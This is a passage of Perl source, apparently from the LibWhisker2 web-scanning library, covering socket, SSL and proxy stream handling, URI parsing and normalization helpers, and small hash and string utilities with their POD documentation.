failed' )\n                  if ( !bind( $xr->{sock}, sockaddr_in( $p, $a ) ) );\n            }\n        }\n\n        if ( !defined $xr->{iaton} ) {\n            $xr->{iaton} = inet_aton( $xr->{chost} );\n            return _stream_err( $xr, 0, 'can\\'t resolve hostname' )\n              if ( !defined $xr->{iaton} );\n        }\n\n    }\n    \n    $xr->{socket_alloc}++;\n    return 1;\n}\n\nsub _stream_socket_nonblock {\n    my ( $fl, $xr, $nonblock ) = ( 0, @_ );\n\n    if ( $^O =~ /Win32/ ) {\n        $fl = 1 if ($nonblock);\n\n        # 0x8004667e = FIONBIO in Winsock2.h\n        if ( !ioctl( $xr->{sock}, 0x8004667e, \\$fl ) ) {\n            return 0;\n        }\n    }\n    else {\n        if ( !( $fl = fcntl( $xr->{sock}, F_GETFL, 0 ) ) ) {\n            return 0;\n        }\n        $fl |= O_NONBLOCK if ($nonblock);\n        $fl &= ~O_NONBLOCK if ( !$nonblock );\n        if ( !( fcntl( $xr->{sock}, F_SETFL, $fl ) ) ) {\n            return 0;\n        }\n\n    }\n    return 1;\n}\n\nsub _stream_socket_open {\n    my ( $vin, $xr, $wh ) = ( '', @_ );\n    return 0 if ( !defined $wh );\n\n    $xr->{'close'}->() if ( $xr->{state} > 0 );\n    return 0 if ( !_stream_socket_alloc( $xr, $wh ) );\n    $xr->{timeout} = $wh->{whisker}->{timeout} || 10;\n\n    if ( $xr->{nonblock} ) {\n        if ( !_stream_socket_nonblock( $xr, 1 ) ) {\n            $xr->{nonblock} = 0;\n            $LW_NONBLOCK_CONNECT = 0;\n        }\n        else {\n            my $R = ( $LW2_CAN_IPv6 ) ?\n                connect( $xr->{sock}, $xr->{iaton} ) :\n                connect( $xr->{sock}, sockaddr_in( $xr->{cport}, $xr->{iaton} ) ) ;\n            \n            if ( !$R ) {\n                return _stream_err( $xr, 1, 'can\\'t connect (connect error)' )\n                  if ( $! != EINPROGRESS && $! != EWOULDBLOCK );\n                vec( $vin, fileno( $xr->{sock} ), 1 ) = 1;\n                return _stream_err( $xr, 1, 'can\\'t connect (timeout)' )\n                  if ( !select( undef, $vin, $vin, $xr->{timeout} )\n                    || !getpeername( $xr->{sock} ) );\n            }\n\n            # leave in nonblock for normal TCP\n            #\t\t\tif($xr->{streamtype} != 1 && !_stream_socket_nonblock($xr,0)){\n            #\t\t\t\t$LW_NONBLOCK_CONNECT=0;\n            #\t\t\t\treturn _stream_err($xr,1,'setting sock to block');\n            #\t\t\t}\n        }\n    }\n\n    if ( !$xr->{nonblock} ) {\n        eval {\n            local $SIG{ALRM} = sub { die \"timeout\\n\" };\n            eval { alarm( $xr->{timeout} ) };\n\n            my $R = ( $LW2_CAN_IPv6 ) ?\n                connect( $xr->{sock}, $xr->{iaton} ) :\n                connect( $xr->{sock}, sockaddr_in( $xr->{cport}, $xr->{iaton} ) );\n\n            if ( !$R )\n            {\n                eval { alarm(0) };\n                die \"connect failed\\n\";\n            }\n            eval { alarm(0) };\n        };\n        return _stream_err( $xr, 0,\n            'can\\'t connect (' . substr( $@, 0, index( $@, \"\\n\" ) ) . ')' )\n          if ($@);\n    }\n\n    binmode( $xr->{sock} );\n    my $S = select( $xr->{sock} );\n    $|++;\n    select($S);\n    $xr->{state} = 1;\n    $xr->{syns}++;\n    return 1;\n}\n\nsub _stream_ssl_open {\n    my ( $xr, $wh ) = @_;\n    return 0         if ( !defined $wh );\n    $xr->{close}->() if ( $xr->{state} > 0 );\n    my $W = $wh->{whisker};\n\n    if ( $xr->{streamtype} == 5 ) {\n\n        # these have to always be set, to overwrite any previous\n        # set values (using ENV is a crappy way to do this)\n        $ENV{HTTPS_KEY_FILE}  = $W->{ssl_rsacertfile} || '';\n        $ENV{HTTPS_CERT_FILE} = $W->{ssl_certfile}    || '';\n\teval {\n            $xr->{sock}           = Net::SSL->new(\n                PeerAddr => $xr->{chost},\n                PeerPort => $xr->{cport},\n                Timeout  => $xr->{timeout}\n            );\n\t};\n        return _stream_err( $xr, 0, 'can\\'t connect: ' . $@ ) \n\t\tif ($@ || !defined $xr->{sock});\n        $xr->{sock}->autoflush(1);\n        $xr->{state} = 1;\n\n        # Net::SSL doesn't use stream_socket_open, so fake syns\n        $xr->{syns}++;\n        return 1;\n    }\n\n    return 0 if ( $xr->{streamtype} != 4 );\n\n    # otherwise, we're stream_NETSSLEAY\n\n    if ( !defined $xr->{ctx} ) {\n        return _stream_err( $xr, 0, 'ssl ctx create' )\n          if ( !( $xr->{ctx} = Net::SSLeay::CTX_new() ) );\n        Net::SSLeay::CTX_set_options( $xr->{ctx}, &Net::SSLeay::OP_ALL );\n        if ( defined $W->{ssl_rsacertfile} ) {\n            if (\n                !(\n                    Net::SSLeay::CTX_use_RSAPrivateKey_file(\n                        $xr->{ctx}, $W->{ssl_rsacertfile},\n                        &Net::SSLeay::FILETYPE_PEM\n                    )\n                )\n              )\n            {\n                return _stream_err( $xr, 0, 'ssl ctx rsacert' );\n            }\n        }\n        if ( defined $W->{ssl_certfile} ) {\n            if (\n                !(\n                    Net::SSLeay::CTX_use_certificate_file(\n                        $xr->{ctx}, $W->{ssl_certfile},\n                        &Net::SSLeay::FILETYPE_PEM\n                    )\n                )\n              )\n            {\n                return _stream_err( $xr, 0, 'ssl ctx cert' );\n            }\n        }\n    }\n\n\t\t# just to be safe, catch any errors that didn't get returned\n\t\treturn _stream_err($xr, 0, 'ssl setup error' )\n\t\t\tif( __bad_netssleay_error() );\n\n    return _stream_err( $xr, 0, 'ssl create new' )\n      if ( !( $xr->{sslobj} = Net::SSLeay::new( $xr->{ctx} ) ) );\n    # SNI stuff\n\t Net::SSLeay::set_tlsext_host_name($xr->{sslobj}, $W->{host});\n    if ( defined $W->{ssl_ciphers} ) {\n        if (\n            !(\n                Net::SSLeay::set_cipher_list(\n                    $xr->{sslobj}, $W->{ssl_ciphers}\n                )\n            )\n          )\n        {\n            return _stream_err( $xr, 0, 'ssl set ciphers' );\n        }\n    }\n\n    # now we use a normal socket to connect\n    return 0 if ( !_stream_socket_open( $xr, $wh ) );\n    $xr->{state} = 1;\n\n    if ( $xr->{proxy} ) {\n        my $C = 'CONNECT ' . $W->{host} . ':' . $W->{port} . \" HTTP/1.0\\r\\n\";\n        $C .= 'Proxy-Authorization: ' . $wh->{'Proxy-Authorization'} . \"\\r\\n\"\n          if ( defined $wh->{'Proxy-Authorization'} );\n        $C .= \"\\r\\n\";\n\n        my $r = syswrite( $xr->{sock}, $C, length($C) );\n        return _stream_err( $xr, 1, 'sending proxy connect string' )\n          if ( !defined $r || $r != length($C) );\n\n        # now we need to read proxy response and parse it\n        do {\n            return _stream_err( $xr, 1, 'ssl proxy request failed' )\n              if ( !_stream_socket_read($xr) );\n          } while ( index( $xr->{bufin}, \"\\n\\n\" ) == -1\n            && index( $xr->{bufin}, \"\\r\\n\\r\\n\" ) == -1 );\n        return _stream_err( $xr, 1, 'proxy couldn\\'t make connection' )\n          if ( $xr->{bufin} !~ /^HTTP\\/1.[0-9]+\\W+200/ );\n\n        #$xr->{bufin}='';\n        $xr->{clearall}->();\n    }\n\n    Net::SSLeay::set_fd( $xr->{sslobj}, fileno( $xr->{sock} ) );\n    Net::SSLeay::set_session( $xr->{sslobj}, $xr->{sslsession} )\n      if ( defined $xr->{sslsession} );\n    return _stream_err( $xr, 1, 'ssl connect failed' )\n      if ( !( Net::SSLeay::connect( $xr->{sslobj} ) ) ||\n      \t__bad_netssleay_error() );\n\n    # my $x = Net::SSLeay::ctrl( $xr->{sslobj}, 6, 0, '' );\n    $xr->{sslsession} = Net::SSLeay::get_session( $xr->{sslobj} )\n      if ( defined $W->{ssl_resume} && $W->{ssl_resume} > 0 );\n\n    # little trickery to abstract/normalize stuff\n    $xr->{origsock} = $xr->{sock};\n    $xr->{sock}     = $xr->{sslobj};\n    return 1;\n}\n\nsub _stream_file_open {\n    my ( $xr, $wh ) = @_;\n    $xr->{close}->() if ( $xr->{state} > 0 );\n    my $file = $wh->{whisker}->{file_stream};\n    return _stream_err( $xr, 0, 'invalid file' )\n      if ( !-e $file || !-f $file );\n    return _stream_err( $xr, 0, 'file open failure' )\n      if ( !sysopen( $xr->{sock}, $file, 'r' ) );\n    binmode($xr->{sock}); # Stupid Windows\n    $xr->{state} = 1;\n}\n\nsub _stream_file_write {\n    my $xr = shift;\n    $xr->{bufout} = '';\n    return 1;\n}\n\nsub _stream_buffer_open {\n    my ( $xr, $wh ) = @_;\n    $xr->{close}->() if ( $xr->{state} > 0 );\n    $xr->{state} = 1;\n}\n\nsub _stream_buffer_close {\n    my $xr = shift;\n    $xr->{state} = 0;\n    $xr->{bufout} = $xr->{bufin} = '';\n}\n\nsub _stream_buffer_read {\n    my $xr = shift;\n    return 0 if ( $xr->{state} == 0 );\n    if ( length( $xr->{bufout} ) > 0 ) {\n        $xr->{bufin} .= $xr->{bufout};\n        $xr->{bufout} = '';\n    }\n    if ( length( $xr->{bufin} ) == 0 ) {\n        $xr->{eof} = 1;\n        return 0;\n    }\n    $xr->{eof} = 0;\n    return 1;\n}\n\nsub _stream_buffer_write {\n    my ( $xr, $data ) = ( shift, shift );\n    return 0 if ( $xr->{state} == 0 );\n    $xr->{bufout} .= $data if ( defined $data );\n    my $len = length( $xr->{bufout} );\n    return 1 if ( $len == 0 );\n    $xr->{bufin} .= $xr->{bufout};\n    $xr->{bufout} = '';\n    return 1;\n}\n\nsub _stream_err {\n    my ( $xr, $close, $error ) = @_;\n    $xr->{error} = $error;\n    $xr->{error} .= \": $!\" if ( defined $! && $! ne '' );\n    $xr->{'close'}->() if ($close);\n    $xr->{state} = 0;\n    return 0;\n}\n\n\n########################################################################\n\n=item B<time_mktime>\n\nParams: $seconds, $minutes, $hours, $day_of_month, $month, $year_minus_1900\n\nReturn: $seconds [ -1 on error ]\n\nPerforms a general mktime calculation with the given time components.\nNote that the input parameter values are expected to be in the format\noutput by localtime/gmtime.  Namely, $seconds is 0-60 (yes, there can\nbe a leap second value of 60 occasionally), $minutes is 0-59, $hours\nis 0-23, $days is 1-31, $month is 0-11, and $year is 70-127.  This\nfunction is limited in that it will not process dates prior to 1970 or\nafter 2037 (that way 32-bit time_t overflow calculations aren't required).\n\nAdditional parameters passed to the function are ignored, so it is\nsafe to use the full localtime/gmtime output, such as:\n\n\t$seconds = LW2::time_mktime( localtime( time ) );\n\nNote: this function does not adjust for time zone, daylight savings\ntime, etc.  You must do that yourself.\n\n=cut\n\n# sub time_mktime {\n# \tmy ($sec,$min,$hour,$day,$mon,$yr)=@_;\n# \tmy @md=(0,31,59,90,120,151,181,212,243,273,304,334);\n# \tforeach(@_[0..5]){\n# \t\treturn -1 if !defined $_ || $_<0; }\n# \treturn -1 if($sec>60 || $min>59 || $hour>23 || $day>31 || $mon>11\n# \t\t|| $yr>137 || $yr<70);\n# \t$yr += 1900;\n# \tmy $res = ($yr-1970)*365+$md[$mon];\n# \t$res += int(($yr-1969)/4) + int(($yr-1601)/400);\n# \t$res -= int(($yr-1901)/100);\n# \t$res = ($res+$day-1)*24;\n# \t$res = ($res+$hour)*60;\n# \t$res = ($res+$min)*60;\n# \treturn $res+$sec;\n# }\n\n\n=item B<time_gmtolocal>\n\nParams: $seconds_gmt\n\nReturn: $seconds_local_timezone\n\nTakes a seconds value in UTC/GMT time and adjusts it to reflect the current\ntimezone.  This function is slightly expensive; it takes the gmtime() and\nlocaltime() representations of the current time, calculates the delta \ndifference by turning them back into seconds via time_mktime, and then \napplies this delta difference to $seconds_gmt.\n\nNote that if you give this function a time and subtract the return value from\nthe original time, you will get the delta value.  At that point, you can just\napply the delta directly and skip calling this function, which is a massive\nperformance boost.  However, this will cause problems if you have a long\nrunning program which crosses daylight savings time boundaries, as the DST\nadjustment will not be accounted for unless you recalculate the new delta.\n\n=cut\n\n# sub time_gmtolocal {\n# \tmy $t = shift;\n# \tmy $now = time;\n# \tmy $utc = time_mktime(gmtime($now));\n# \tmy $me = time_mktime(localtime($now));\n# \treturn $t - ($utc - $me);\n# }\n\n\n#################################################################\n\n=item B<uri_split>\n\nParams: $uri_string [, \\%request_hash]\n\nReturn: @uri_parts\n\nReturn an array of the following values, in order:  uri, protocol, host,\nport, params, frag, user, password.  Values not defined are given an undef\nvalue.  If a %request hash is passed in, then uri_split() will also set \nthe appropriate values in the hash.\n\nNote:  uri_split() will only set the %request hash if the protocol\nis HTTP or HTTPS!\n\n=cut\n\nsub uri_split {\n    my ( $uri, $work ) = ( shift, '', 0 );\n    my ($hr) = shift;\n\n    #       (uri,protocol,host,port,params,frag,user,pass)\n    my @res = ( undef, undef, undef, 0, undef, undef, undef, undef );\n\n    return undef if ( !defined $uri );\n\n    # remove fragments\n    ( $uri, $res[5] ) = split( '#', $uri, 2 ) if ( index( $uri, '#', 0 ) >= 0 );\n\n    # get scheme and net_loc\n    my $net_loc = undef;\n    if ( $uri =~ s/^([-+.a-z0-9A-Z]+):// ) {\n        $res[1] = lc($1);\n        if ( substr( $uri, 0, 2 ) eq '//' ) {\n            my $w = index( $uri, '/', 2 );\n            if ( $w >= 0 ) {\n                $net_loc = substr( $uri, 2, $w - 2 );\n                $uri = substr( $uri, $w, length($uri) - $w );\n            }\n            else {\n                ( $net_loc = $uri ) =~ tr#/##d;\n                $uri = '/';\n            }\n        }\n    }\n\n    # parse net_loc info\n    if ( defined $net_loc ) {\n        if ( index( $net_loc, '@', 0 ) >= 0 ) {\n            ( $res[6], $net_loc ) = split( /\\@/, $net_loc, 2 );\n            if ( index( $res[6], ':', 0 ) >= 0 ) {\n                ( $res[6], $res[7] ) = split( ':', $res[6], 2 );\n            }\n        }\n        $res[3] = $1 if ( $net_loc =~ s/:([0-9]+)$// );\n        $res[2] = $net_loc;\n    }\n\n    # remove query info\n    ( $uri, $res[4] ) = split( '\\?', $uri, 2 )\n      if ( index( $uri, '?', 0 ) >= 0 );\n\n    # whatever is left over is the uri\n    $res[0] = $uri;\n\n    if ( $res[3] == 0 && defined $res[1] ) {\n        $res[3] = 80  if ( $res[1] eq 'http' );\n        $res[3] = 443 if ( $res[1] eq 'https' );\n    }\n\n    my $rel_uri = 0;\n    $rel_uri++\n      if ( $res[3] == 0\n        && !defined $res[2]\n        && !defined $res[1]\n        && $res[0] ne '' );\n    return @res if ( $res[3] == 0 && !$rel_uri );\n\n    if ( defined $hr && ref($hr) ) {\n\n        $$hr{whisker}->{uri} = $res[0] if ( defined $res[0] );\n        if ( defined $res[4] ) {\n            $$hr{whisker}->{parameters} = $res[4];\n        }\n        else { delete $$hr{whisker}->{parameters}; }\n\n        return @res if ($rel_uri);\n\n\t\t\t\tif ( $res[1] eq 'https' ) {\n\t        $$hr{whisker}->{ssl} = 1;\n\t      } else { $$hr{whisker}->{ssl} = 0; }\n        $$hr{whisker}->{host} = $res[2] if ( defined $res[2] );\n        $$hr{whisker}->{port} = $res[3];\n\n        if ( defined $res[6] ) {\n            $$hr{whisker}->{uri_user} = $res[6];\n        }\n        else { delete $$hr{whisker}->{uri_user}; }\n        if ( defined $res[7] ) {\n            $$hr{whisker}->{uri_password} = $res[7];\n        }\n        else { delete $$hr{whisker}->{uri_password}; }\n    }\n\n    return @res;\n}\n\n#################################################################\n\n=item B<uri_join>\n\nParams: @vals\n\nReturn: $url\n\nTakes the @vals array output from uri_split, and returns a single \nscalar/string with them joined again, in the form of:\nprotocol://user:pass@host:port/uri?params#frag\n\n=cut\n\nsub uri_join {\n    my @V = @_;\n    my $URL;\n\n    $URL .= $V[1] . ':' if defined $V[1];\n    if ( defined $V[2] ) {\n        $URL .= '//';\n        if ( defined $V[6] ) {\n            $URL .= $V[6];\n            $URL .= ':' . $V[7] if defined $V[7];\n            $URL .= '@';\n        }\n        $URL .= $V[2];\n    }\n\n    if ( $V[3] > 0 ) {\n        my $no = 0;\n        $no++ if ( $V[3] == 80  && defined $V[1] && $V[1] eq 'http' );\n        $no++ if ( $V[3] == 443 && defined $V[1] && $V[1] eq 'https' );\n        $URL .= ':' . $V[3] if ( !$no );\n    }\n\n    $URL .= $V[0];\n    $URL .= '?' . $V[4] if defined $V[4];\n    $URL .= '#' . $V[5] if defined $V[5];\n    return $URL;\n}\n\n#################################################################\n\n=item B<uri_absolute>\n\nParams: $uri, $base_uri [, $normalize_flag ]\n\nReturn: $absolute_uri\n\nDouble checks that the given $uri is in absolute form (that is,\n\"http://host/file\"), and if not (it's in the form \"/file\"), then\nit will append the given $base_uri to make it absolute.  This\nprovides a compatibility similar to that found in the URI\nsubpackage.\n\nIf $normalize_flag is set to 1, then the output will be passed\nthrough uri_normalize before being returned.\n\n=cut\n\nsub uri_absolute {\n    my ( $uri, $buri, $norm ) = @_;\n    return undef if ( !defined $uri || !defined $buri );\n\n    return $uri if ( $uri =~ m#^[-+.a-z0-9A-Z]+://# );\n\n    if ( substr( $uri, 0, 1 ) eq '/' ) {\n        if ( $buri =~ m#^[-+.a-z0-9A-Z]+://# ) {\n            my @p = uri_split($buri);\n            $buri = \"$p[1]://$p[2]\";\n            $buri .= \":$p[3]\" if ( ($p[1] eq 'http' && $p[3] != 80) ||\n            \t($p[1] eq 'https' && $p[3] != 443) );\n\n            #\t\t\t$buri.='/';\n        }\n        else {    # ah suck, base URI isn't absolute...\n            return $uri;\n        }\n    }\n    else {\n        $buri =~ s/[?#].*$//;    # remove params and fragments\n        $buri .= '/' if ( $buri =~ m#^[a-z]+://[^/]+$#i );\n        $buri =~ s#/[^/]*$#/#;\n    }\n\n    return uri_normalize(\"$buri$uri\")\n      if ( defined $norm && $norm > 0 );\n    return $buri . $uri;\n}\n\n#################################################################\n\n=item B<uri_normalize>\n\nParams: $uri [, $fix_windows_slashes ]\n\nReturn: $normalized_uri [ undef on error ]\n\nTakes the given $uri and does any /./ and /../ dereferencing in\norder to come up with the correct absolute URL.  If the $fix_\nwindows_slashes parameter is set to 1, all \\ (back slashes) will\nbe converted to / (forward slashes).\n\nNon-http/https URIs return an error.\n\n=cut\n\nsub uri_normalize {\n    my ( $host, $uri, $win ) = ( '', @_ );\n\n    $uri =~ tr#\\\\#/# if ( defined $win && $win > 0 );\n\n    if ( $uri =~ s#^([-+.a-z0-9A-Z]+:)## ) {\n        return undef if ( $1 ne 'http:' && $1 ne 'https:' );\n        $host = $1;\n        return undef unless ( $uri =~ s#^(//[^/]+)## );\n        $host .= $1;\n    }\n    return \"$host/\" if ( $uri eq '' || $uri eq '/' );\n\n    # fast path check\n    return \"$host$uri\" if ( index( $uri, '/.' ) < 0 );\n\n    my $extra = '';\n    $extra = $1 if($uri =~ s/([?#].*)$//);    # remove params and fragments\n\n    # parse order/steps as defined in RFC 1808\n    1 while ( $uri =~ s#/\\./#/# || $uri =~ s#//#/# );\n    $uri =~ s#/\\.$#/#;\n    1 while ( $uri =~ s#[^/]+/\\.\\./## );\n    1 while ( $uri =~ s#^/\\.\\./#/# );\n    $uri =~ s#[^/]*/\\.\\.$##;\n    $uri ||= '/';\n    return $host . $uri . $extra;\n}\n\n#################################################################\n\n=item B<uri_get_dir>\n\nParams: $uri\n\nReturn: $uri_directory\n\nWill take a URI and return the directory base of it, i.e. /rfp/page.php \nwill return /rfp/.\n\n=cut\n\nsub uri_get_dir {\n    my ( $w, $URL ) = ( 0, shift );\n\n    return undef if ( !defined $URL );\n    $URL = substr( $URL, 0, $w ) if ( ( $w = index( $URL, '#' ) ) >= 0 );\n    $URL = substr( $URL, 0, $w ) if ( ( $w = index( $URL, '?' ) ) >= 0 );\n    return $URL if ( substr( $URL, -1, 1 ) eq '/' );\n\n    if ( ( $w = rindex( $URL, '/' ) ) >= 0 ) {\n        $URL = substr( $URL, 0, $w + 1 );\n    }\n    else {\n        $URL = '';\n    }\n    return $URL;\n}\n\n#################################################################\n\n=item B<uri_strip_path_parameters>\n\nParams: $uri [, \\%param_hash]\n\nReturn: $stripped_uri\n\nThis function removes all URI path parameters of the form\n\n /blah1;foo=bar/blah2;baz\n\nand returns the stripped URI ('/blah1/blah2').  If the optional\nparameter hash reference is provided, the stripped parameters\nare saved in the form of 'blah1'=>'foo=bar', 'blah2'=>'baz'.\n\nNote: only the last value of a duplicate name is saved into the \nparam_hash, if provided.  So a $uri of '/foo;A/foo;B/' will result \nin a single hash entry of 'foo'=>'B'.\n\n=cut\n\nsub uri_strip_path_parameters {\n    my ( $uri, $hr ) = @_;\n    my $s   = 0;\n    $s++ if ( defined $hr && ref($hr) );\n\n    my @p = split( /\\//, $uri, -1 );\n    map {\n        if (s/;(.*)$//) { $$hr{$_} = $1 if ($s); }\n    } @p;\n\n\t\treturn join( '/', @p );\n}\n\n#################################################################\n\n=item B<uri_parse_parameters>\n\nParams: $parameter_string [, $decode, $multi_flag ]\n\nReturn: \\%parameter_hash\n\nThis function takes a string in the form of:\n\n foo=1&bar=2&baz=3&foo=4\n\nAnd parses it into a hash.  In the above example, the element 'foo'\nhas two values (1 and 4).  If $multi_flag is set to 1, then the\n'foo' hash entry will hold an anonymous array of both values. \nOtherwise, the default is to just contain the last value (in this\ncase, '4').\n\nIf $decode is set to 1, then normal hex decoding is done on the\ncharacters, where needed (both the name and value are decoded).\n\nNote: if a URL parameter name appears without a value, then the\nvalue will be set to undef.  E.g. for the string \"foo=1&bar&baz=2\",\nthe 'bar' hash element will have an undef value.\n\n=cut\n\nsub uri_parse_parameters {\n    my ( $str, $decode, $multi ) = @_;\n    my %P;\n    if( $str !~ tr/=&// ){\n    \t$P{$str} = undef;\n    \treturn \\%P;\n    }\n\n    $multi  ||= 0;\n    $decode ||= 0;\n    foreach ( split( /&/, $str ) ) {\n        my ( $name, $value ) = split( /=/, $_, 2 );\n        if ($decode) {\n            $name  = uri_unescape($name);\n            $value = uri_unescape($value);\n        }\n        if ( defined $P{$name} && $multi ) {\n            if ( ref( $P{$name} ) ) { push @{ $P{$name} }, $value; }\n            else { $P{$name} = [ $P{$name}, $value ]; }\n        }\n        else {\n            $P{$name} = $value;\n        }\n    }\n    return \\%P;\n}\n\n#################################################################\n\n=item B<uri_escape>\n\nParams: $data\n\nReturn: $encoded_data\n\nThis function encodes the given $data so it is safe to be used in URIs.\n\n=cut\n\nsub uri_escape {\n    my $data = shift;\n    return undef if ( !defined $data );\n    $data =~ s/\\%/\\%25/g;\n    $data =~ s/([+?&=#;@\\\\\\/])/sprintf(\"%%%02x\",ord($1))/eg;\n    $data =~ tr/ /+/;\n    $data =~ s/([^!-~])/sprintf(\"%%%02x\",ord($1))/eg;\n    return $data;\n}\n\n#################################################################\n\n=item B<uri_unescape>\n\nParams: $encoded_data\n\nReturn: $data\n\nThis function decodes the given $data out of URI format.\n\n=cut\n\nsub uri_unescape {\n    my $data = shift;\n    return undef if ( !defined $data );\n    $data =~ tr/+/ /;\n    $data =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(\"C\",hex($1))/eg;\n    return $data;\n}\n\n#################################################################\n\n\n########################################################################\n\n=item B<utils_recperm>\n\nParams: $uri, $depth, \\@dir_parts, \\@valid, \\&func, \\%track, \\%arrays, \\&cfunc\n\nReturn: nothing\n\nThis is a special function which is used to recursively-permutate through\na given directory listing.  This is really only used by whisker, in order\nto traverse down directories, testing them as it goes.  See whisker 2.0 for\nexact usage examples.\n\n=cut\n\n# '/', 0, \\@dir.split, \\@valid, \\&func, \\%track, \\%arrays, \\&cfunc\n# sub utils_recperm {\n#     my ( $d, $p, $pp, $pn, $r, $fr, $dr, $ar, $cr ) = ( '', shift, shift, @_ );\n#     $p =~ s#/+#/#g;\n#     if ( $pp >= @$pn ) {\n#         push @$r, $p if &$cr( $$dr{$p} );\n#     }\n#     else {\n#         my $c = $$pn[$pp];\n#         if ( $c !~ /^\\@/ ) {\n#             utils_recperm( $p . $c . '/', $pp + 1, @_ )\n#               if ( &$fr( $p . $c . '/' ) );\n#         }\n#         else {\n#             $c =~ tr/\\@//d;\n#             if ( defined $$ar{$c} ) {\n#                 foreach $d ( @{ $$ar{$c} } ) {\n#                     if ( &$fr( $p . $d . '/' ) ) {\n#                         utils_recperm( $p . $d . '/', $pp + 1, @_ );\n#                     }\n#                 }\n#             }\n#         }\n#     }\n# }\n\n#################################################################\n\n=item B<utils_array_shuffle>\n\nParams: \\@array\n\nReturn: nothing\n\nThis function will randomize the order of the elements in the given array.\n\n=cut\n\n# sub utils_array_shuffle {    # fisher yates shuffle....w00p!\n#     my $array = shift;\n#     my $i;\n#     for ( $i = @$array ; --$i ; ) {\n#         my $j = int rand( $i + 1 );\n#         next if $i == $j;\n#         @$array[ $i, $j ] = @$array[ $j, $i ];\n#     }\n# }    # end array_shuffle, from Perl Cookbook (rock!)\n\n#################################################################\n\n=item B<utils_randstr>\n\nParams: [ $size, $chars ]\n\nReturn: $random_string\n\nThis function generates a random string between 10 and 20 characters\nlong, or of $size if specified.  If $chars is specified, then the\nrandom function picks characters from the supplied string.  For example,\nto have a random string of 10 characters, composed of only the characters\n'abcdef', then you would run:\n\n utils_randstr(10,'abcdef');\n\nThe default character string is alphanumeric.\n\n=cut\n\nsub utils_randstr {\n    my $str;\n    my $drift = shift || ( ( rand() * 10 ) % 10 ) + 10;\n\n    # 'a'..'z' doesn't seem to work on string assignment :(\n    my $CHARS = shift\n      || 'abcdefghijklmnopqrstuvwxyz'\n      . 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n      . '0123456789';\n\n    my $L = length($CHARS);\n    for ( 1 .. $drift ) {\n        $str .= substr( $CHARS, ( ( rand() * $L ) % $L ), 1 );\n    }\n    return $str;\n}\n\n#################################################################\n\n=item B<utils_port_open>\n\nParams: $host, $port\n\nReturn: $result\n\nQuick function to attempt to make a connection to the given host and\nport.  If a connection was successfully made, function will return true\n(1).  Otherwise it returns false (0).\n\nNote: this uses standard TCP connections, thus is not recommended for use\nin port-scanning type applications.  Extremely slow.\n\n=cut\n\nsub utils_port_open {    # this should be platform-safe\n    my ( $target, $port ) = @_;\n\n    return 0 if ( !defined $target || !defined $port );\n    return 0 if ( !defined $Socket::VERSION );\n\n    my $open = 0;\n    \n    if ( $LW2_CAN_IPv6 ) {\n\n        my ($err, @results) =\n            getaddrinfo($target, $port, {\n                socktype => SOCK_STREAM, protocol => IPPROTO_TCP,\n                family => ( $main::CLI{'ipv6'} ) ?  AF_INET6 :  AF_INET\n                } );\n\n        foreach my $sk (@results) {\n            if ( socket(S, $sk->{family}, $sk->{socktype}, $sk->{proto}) ) {\n                $open = connect(S, $sk->{addr} );\n                last if $open;\n            }\n        }\n        \n    } else {\n        if ( !( socket( S, PF_INET, SOCK_STREAM, 0 ) ) ) { return 0; }\n        $open = ( connect( S, sockaddr_in( $port, inet_aton($target) ) ) );\n    }\n    \n    if ( $open ) {\n        close(S);\n        return 1;        \n    } else { return 0; }\n    \n}\n\n#################################################################\n\n=item B<utils_lowercase_keys>\n\nParams: \\%hash\n\nReturn: $number_changed\n\nWill lowercase all the header names (but not values) of the given hash.\n\n=cut\n\nsub utils_lowercase_keys {\n    my $href = shift;\n\n    return if ( !( defined $href && ref($href) ) );\n\n    my $count = 0;\n    while ( my ( $key, $val ) = each %$href ) {\n        if ( $key =~ tr/A-Z// ) {\n            $count++;\n            delete $$href{$key};\n            $$href{ lc($key) } = $val;\n        }\n    }\n    return $count;\n}\n\n#################################################################\n\n=item B<utils_find_lowercase_key>\n\nParams: \\%hash, $key\n\nReturn: $value, undef on error or not exist\n\nSearches the given hash for the $key (regardless of case), and\nreturns the value. If the return value is placed into an array, the\nwill dereference any multi-value references and return an array of\nall values.\n\nWARNING!  In scalar context, $value can either be a single-value\nscalar or an array reference for multiple scalar values.  That means\nyou either need to check the return value and act appropriately, or\nuse an array context (even if you only want a single value).  This is\nvery important, even if you know there are no multi-value hash keys.\nThis function may still return an array of multiple values even if\nall hash keys are single value, since lowercasing the keys could result\nin multiple keys matching.  For example, a hash with the values\n{ 'Foo'=>'a', 'fOo'=>'b' } technically has two keys with the lowercase\nname 'foo', and so this function will either return an array or array\nreference with both 'a' and 'b'.\n\n=cut\n\nsub utils_find_lowercase_key {\n    return utils_find_key( $_[0], $_[1], 1 );\n}\n\n#################################################################\n\n=item B<utils_find_key>\n\nParams: \\%hash, $key\n\nReturn: $value, undef on error or not exist\n\nSearches the given hash for the $key (case-sensitive), and\nreturns the value. If the return value is placed into an array, the\nwill dereference any multi-value references and return an array of\nall values.\n\n=cut\n\nsub utils_find_key {\n    my ( $href, $key, $dolower ) = ( shift, shift, shift || 0 );\n\n    return undef if ( !( defined $href && ref($href) ) );\n    return undef if ( !defined $key );\n\n    if ($dolower) {\n        $key = lc($key);\n        my ( $k, $v );\n\t\t\t\tmy @match;\n        while ( ( $k, $v ) = each %$href ) {\n            if ( lc($k) eq $key ) {\n                if( ref($v) ) {\n                    push @match, @$v;\n                } else {\n                    push @match, $v;\n                }\n            }\n        }\n        return @match if wantarray();\n        return \\@match if( ~~@match > 1 );\n        return $match[0];\n    }\n    else {\n        return @{ $href->{$key} } if ( ref( $href->{$key} ) && wantarray() );\n        return $href->{$key};\n    }\n    return undef;\n}\n\n#################################################################\n\n=item B<utils_delete_lowercase_key>\n\nParams: \\%hash, $key\n\nReturn: $number_found\n\nSearches the given hash for the $key (regardless of case), and\ndeletes the key out of the hash if found.  The function returns\nthe number of keys found and deleted (since multiple keys can\nexist under the names 'Key', 'key', 'keY', 'KEY', etc.).\n\n=cut\n\nsub utils_delete_lowercase_key {\n    my ( $href, $key ) = ( shift, lc(shift) );\n\n    return undef if ( !( defined $href && ref($href) ) );\n    return undef if ( !defined $key );\n\n    my $deleted = 0;\n    foreach ( keys %$href ) {\n        if ( lc($_) eq $key ) {\n            delete $href->{$_};\n            $deleted++;\n        }\n    }\n    return $deleted;\n}\n\n#################################################################\n\n=item B<utils_getline>\n\nParams: \\$data [, $resetpos ]\n\nReturn: $line (undef if no more data)\n\nFetches the next \\n 